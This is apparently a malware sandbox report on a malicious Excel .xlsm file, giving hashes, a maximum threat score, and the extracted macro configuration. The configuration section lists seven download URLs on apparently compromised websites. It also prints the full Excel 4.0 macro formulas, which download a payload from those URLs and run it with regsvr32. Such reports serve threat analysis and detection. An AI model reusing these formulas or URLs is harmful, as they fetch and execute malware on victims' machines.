Overview

overview

10

Static

static

10

40bbb2b580...7.xlsm

windows7-x64

10

40bbb2b580...7.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    40bbb2b5801af72d5d40bd204db7f0241dc6f51091b11a169cc1c84cc2a33757

  • Size

    35KB

  • MD5

    e7285266d8dbe9463f18b841db473141

  • SHA1

    0427a60eac048166ca78011ab69a6012f67109db

  • SHA256

    40bbb2b5801af72d5d40bd204db7f0241dc6f51091b11a169cc1c84cc2a33757

  • SHA512

    912477c714e6ad5c241c6128ced34c338d98063d0db6a2bc89225d0710322ea0ef90bcd12fdf8fb51e8cc4d3526502c9126a8bcdb50e02594b7ea7a1c4440e82

  • SSDEEP

    768:xsmn9tnd5euAjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooofS:xFtndguUOZZ1ZYpoQ/pMA6Kt

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/

https://blog.nilbt.com/wp-includes/Text/Diff/aleM3D/

https://idolevran.com/wp-admin/nKRqye7TwOjZVjvFib/

https://hindi.muslimmirror.com/wp-includes/NfqhqWd1AfATg6PH3MV/

https://appiterra.com/wp-admin/2sv4jwSsOGh9vD10/

https://reproartivf.com/4MFHyUfpZHmD9VMxCd/A/

https://britonsolicitors.com/wp-admin/mMYswFFOmBVkkjcb3/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://blog.nilbt.com/wp-includes/Text/Diff/aleM3D/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://idolevran.com/wp-admin/nKRqye7TwOjZVjvFib/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hindi.muslimmirror.com/wp-includes/NfqhqWd1AfATg6PH3MV/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://appiterra.com/wp-admin/2sv4jwSsOGh9vD10/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://reproartivf.com/4MFHyUfpZHmD9VMxCd/A/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://britonsolicitors.com/wp-admin/mMYswFFOmBVkkjcb3/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • 40bbb2b5801af72d5d40bd204db7f0241dc6f51091b11a169cc1c84cc2a33757
    .xlsm office2007